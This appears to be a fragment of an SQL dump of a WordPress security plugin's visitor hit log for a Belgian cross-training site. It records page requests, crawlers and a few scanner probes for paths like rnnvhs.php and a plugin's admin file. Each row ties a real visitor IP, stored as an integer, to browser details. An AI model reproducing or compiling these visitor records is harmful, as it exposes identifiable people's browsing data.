(73384, 1495477976.503942, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73385, 1495477977.032297, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73386, 1495477977.558634, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73387, 1495477978.043860, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73388, 1495477978.781048, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73389, 1495478866.394084, 1374843811, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(73390, 1495478867.554257, 1374843811, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(73391, 1495478870.694757, 1374843811, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(73392, 1495478876.294593, 1374843811, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(73393, 1495478878.529719, 1374843811, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(73394, 1495481799.248182, 1538567300, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G928F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(73395, 1495481813.493195, 1538567300, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G928F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(73396, 1495481816.022588, 1538567300, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G928F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(73397, 1495481821.300455, 1538567300, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G928F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(73398, 1495485226.263375, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(73399, 1495485230.295351, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(73400, 1495485245.031070, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(73401, 1495485249.192076, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(73402, 1495485253.784632, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(73403, 1495485258.641395, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(73404, 1495485263.413707, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(73405, 1495485268.187167, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(73406, 1495485649.842721, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(73407, 1495485650.954757, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73408, 1495485651.454379, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73409, 1495485651.868503, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73410, 1495485652.653348, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73411, 1495485653.148925, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73412, 1495485653.666458, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73413, 1495485654.218341, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1');
INSERT INTO `wp_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(73414, 1495485654.700848, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73415, 1495485655.213125, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73416, 1495485655.701996, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73417, 1495485656.169566, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73418, 1495485656.584569, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73419, 1495485657.048101, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73420, 1495486698.584527, 1123633622, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73421, 1495490057.080179, 3161848526, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/infos.php', 'http://crosstrainingcenter.be/infos.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(73422, 1495491078.880470, 3003111232, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)'),
(73423, 1495494340.784534, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73424, 1495512105.232271, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73425, 1495517288.939338, 3652617308, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(73426, 1495517308.497323, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(73427, 1495525214.767366, 2366145562, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(73428, 1495536195.365821, 1539836988, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/eg.php', 'http://www.crosstrainingcenter.be/eg.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(73429, 1495539593.111145, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'AwarioRssBot/1.0 (+https://awario.com/bots.html; bots@awario.com)'),
(73430, 1495539595.031286, 2499535434, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'AwarioRssBot/1.0 (+https://awario.com/bots.html; bots@awario.com)'),
(73431, 1495546600.187515, 3154495934, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73432, 1495546603.643507, 3154495934, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73433, 1495546604.773377, 3154495934, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73434, 1495546605.733491, 3154495934, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73435, 1495546606.432207, 3154495934, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73436, 1495546607.193760, 3154495934, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73437, 1495546609.752597, 3154495934, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73438, 1495546610.289599, 3154495934, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73439, 1495546611.054213, 3154495934, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73440, 1495546611.609937, 3154495934, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73441, 1495546612.300779, 3154495934, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73442, 1495547792.505264, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'AwarioRssBot/1.0 (+https://awario.com/bots.html; bots@awario.com)'),
(73443, 1495550349.404214, 1815808080, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(73444, 1495550354.834594, 1815808080, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(73445, 1495550356.968242, 1815808080, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(73446, 1495550364.719377, 1815808080, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(73447, 1495556358.329172, 2637637398, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73448, 1495556358.933810, 2637637398, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73449, 1495556391.040551, 2503517245, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(73450, 1495568689.310138, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73451, 1495568689.918602, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73452, 1495568690.486252, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73453, 1495568691.011755, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73454, 1495568691.581053, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73455, 1495568692.059089, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73456, 1495568692.698568, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73457, 1495568693.260677, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73458, 1495568693.800975, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73459, 1495568694.408511, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73460, 1495568694.926953, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73461, 1495572416.470849, 1538608887, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://m.facebook.com/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-J510FN Build/MMB29M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/58.0.3029.83 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/124.0.0.22.66;]'),
(73462, 1495573237.814621, 2760155467, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(73463, 1495575943.512807, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(73464, 1495575944.005073, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73465, 1495575944.796819, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73466, 1495575946.763035, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73467, 1495575947.267470, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73468, 1495575947.682675, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73469, 1495575948.116226, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73470, 1495575948.575066, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(73471, 1495575949.016243, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73472, 1495575949.444437, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73473, 1495575950.009268, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73474, 1495575950.780751, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73475, 1495575951.243507, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73476, 1495575951.698849, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73477, 1495592510.317584, 3024883617, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(73478, 1495592677.131647, 3192595645, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-admin/includes/rnnvhs.php', 'http://crosstrainingcenter.be/wp-admin/includes/rnnvhs.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(73479, 1495599617.761028, 2637637400, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73480, 1495601020.683634, 1123633555, 0, 0, 1, 0, 1, 'https://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73481, 1495601021.224079, 1123633555, 0, 1, 1, 0, 1, 'https://www.crosstrainingcenter.be/.well-known/apple-app-site-association', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73482, 1495622818.768484, 3639891306, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php', 'http://crosstrainingcenter.be/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(73483, 1495625687.334806, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73484, 1495625687.892436, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73485, 1495625688.328426, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73486, 1495625688.785413, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73487, 1495625689.233464, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73488, 1495625689.757271, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73489, 1495625690.251584, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73490, 1495625690.754117, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73491, 1495625691.220333, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73492, 1495625691.666291, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73493, 1495625692.137367, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73494, 1495632991.997086, 3024883461, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(73495, 1495633664.274326, 1570674747, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(73496, 1495633767.197490, 786801765, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SemrushBot/1.2~bl; +http://www.semrush.com/bot.html)'),
(73497, 1495637411.260045, 2954838202, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(73498, 1495647073.615559, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(73499, 1495647074.506264, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73500, 1495647075.208526, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73501, 1495647075.717230, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73502, 1495647076.385393, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73503, 1495647076.894932, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73504, 1495647077.857004, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73505, 1495647078.965712, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(73506, 1495647079.766453, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73507, 1495647080.440887, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73508, 1495647080.927837, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
